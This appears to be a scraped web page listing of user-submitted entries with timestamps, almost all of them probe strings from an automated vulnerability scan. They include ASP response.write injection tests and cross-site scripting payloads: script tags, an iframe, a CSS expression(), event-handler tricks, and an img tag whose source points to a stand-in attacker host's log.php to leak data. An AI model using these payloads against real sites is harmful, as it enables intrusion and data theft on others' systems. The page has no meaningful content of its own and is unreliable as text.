  response.write(9062937*9932499)


 • "+response.write(9686976*9052519)+"

  2021-05-06 08:15:35


  1


 • '+response.write(9686976*9052519)+'

  2021-05-06 08:15:34


  1


 • pHqghUme

  2021-05-06 08:15:32


  1


 • response.write(9686976*9052519)

  2021-05-06 08:15:32


  1


 • pHqghUme

  2021-05-06 08:15:31


  1


 • pHqghUme

  2021-05-06 08:15:30


  1


 • pHqghUme

  2021-05-06 08:15:29


  1


 • pHqghUme

  2021-05-06 08:15:28


  1


 • pHqghUme

  2021-05-06 08:15:28


  1


 • pHqghUme

  2021-05-06 08:12:20


  1


 • pHqghUme

  2021-05-06 08:12:03


  1


 • pHqghUme

  2021-05-06 08:11:45


  1CgVE3ZKo6O


 • 1DvpH0co8zO

  2021-05-06 08:11:44


  1


 • pHqghUme

  2021-05-06 08:11:43


  1


 • pHqghUme

  2021-05-06 08:11:42


  1


 • pHqghUme

  2021-05-06 08:03:56


  1


 • pHqghUme<OzL0cG<

  2021-05-06 06:03:20


  1


 • pHqghUme<img sRc='http://attacker-9577/log.php?

  2021-05-06 06:03:14


  1


 • pHqghUme<Vlynn3 x=9175>

  2021-05-06 06:03:09


  1


 • pHqghUme<ifRAme sRc=9289.com></IfRamE>

  2021-05-06 06:03:03


  1


 • pHqghUme<WN5QDY>S90ZT[!+!]</WN5QDY>

  2021-05-06 06:02:56


  1


 • pHqghUmeJTnIa <ScRiPt >wE5m(9786)</ScRiPt>

  2021-05-06 06:02:49


  1


 • pHqghUme<% contenteditable onresize=wE5m(9256)>

  2021-05-06 06:02:43


  1


 • pHqghUme}body{acu:Expre/**/SSion(wE5m(9243))}

  2021-05-06 06:02:37